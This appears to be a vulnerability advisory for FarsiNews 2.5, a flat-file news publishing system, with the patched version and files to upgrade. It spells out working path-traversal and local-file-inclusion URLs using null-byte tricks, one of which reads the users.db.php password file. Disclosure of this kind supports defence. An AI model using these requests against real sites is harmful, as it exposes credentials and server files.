FarsiNews 2.5 Multiple Vulnerabilities FarsiNews is a News Publishing System That uses Flat files to store it`s Datas... Farsinews is a persian and improved translation of CuteNews, AjFork, CuteHack and CuteSQL... for more information about FarsiNews Publishing System visit http://www.farsinewsteam.com Credit: The information has been provided by Hamid Ebadi ( Hamid Network Security Team) : admin@hamid.ir. The original article can be found at : http://hamid.ir/security Vulnerable Systems: FarsiNews 2.5 and below (also tested on 2.1) 1) in FarsiNews if you change the archive value : http://localhost/index.php?archive=hamid ----------------------------[]--------------------------- Warning: file([PATH]/data/archives/hamid.news.arch.php): failed to open stream: No such file or directory in [PATH]\inc\shows.inc.php on line 642 Warning: file([PATH]/data/archives/hamid.comments.arch.php): failed to open stream: No such file or directory in [PATH]\inc\shows.inc.php on line 686 ...[and many other error] ----------------------------[]--------------------------- it means that shows.inc.php try to open '/archives/hamid.news.arch.php' (and also 'hamid.comments.arch.php') to read it's data . we can change the archive value to '/../users.db.php%00' to see all username and password . Exploit : http://localhost/index.php?archive=/../users.db.php%00 http://localhost/Farsi1/index.php?archive=/../[file-to-read]%00 2) Local file inclusion: The following URL will cause local file inclusion: http://localhost/show_archives.php?template=/../../[local-file]%00 farsinews team Patch: use FarsiNews 2.5.3 and upgrade : show_news.php show_archives.php inc/tempeditor.mdu more info : http://forum.farsinewsteam.com/index.php?showtopic=71 http://forum.farsinewsteam.com/index.php?showtopic=76 Signature __________________________________________________ Do You Yahoo!? Tired of spam? Yahoo! Mail has the best spam protection around http://mail.yahoo.com